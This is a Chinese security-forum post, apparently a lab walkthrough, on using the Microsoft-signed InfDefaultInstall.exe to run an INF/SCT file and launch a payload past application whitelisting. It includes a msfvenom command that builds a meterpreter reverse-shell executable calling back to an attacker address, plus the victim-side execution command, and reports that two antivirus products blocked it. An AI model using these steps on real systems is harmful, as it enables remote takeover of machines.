安全矩阵

 找回密码
 立即注册
搜索
查看: 2806|回复: 0

远控免杀专题(63)-白名单InfDefaultInstall.exe执行payload

[复制链接]

98

主题

207

帖子

955

积分

高级会员

Rank: 4

积分
955
发表于 2020-3-31 20:17:13 | 显示全部楼层 |阅读模式
本帖最后由 wholesome 于 2020-3-31 20:21 编辑

​​​​​​​声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus

一、InfDefaultInstall.exe简

InfDefaultInstall.exe是一个用来进行inf安装的工具,具有微软签名,存在路径为:​​​​​​​
  1. C:\Windows\System32\Infdefaultinstall.exe
复制代码


我们可以通过直接该文件后面跟inf文件来进行绕过一些限制

二、利用InfDefaultInstall.exe执行程序


  1. Poc地址如下:https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
复制代码

在本机进行示例,以下为shady2.inf的代码

以下为shady.sct的代码,可以看到最后是调出notepad.exe的

在cmd窗口中运行
  1. InfDefaultInstall.exe "C:\Users\Administrator\Desktop\inf_catalog_signing_poc-master\shady\shady 2.inf"
复制代码

三、利用InfDefaultInstall.exe执行payload


靶机:windows 10   ip地址:172.16.111.194
攻击机:kali linux    ip地址:172.16.111.222
首先使用msf生成exe格式的shellcode
  1. msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=172.16.111.222 lport=3333 -f exe > ./hacker.exe
复制代码

将生成的exe木马复制到靶机,备份一份shady222.inf并更改shady.sct中的文件路径为hacker.exe

在msf中设置监听

靶机中使用InfDefaultInstall.exe运行shady222.inf

攻击机kali成功监听到靶机上线

以下为靶机安装360全家桶和火绒杀毒后的InfDefaultInstall.exe执行效果:360全家桶报毒,kali无法监听。

火绒报毒,kali无法监听。

四、参考资料


https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-2 07:11 , Processed in 0.011054 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表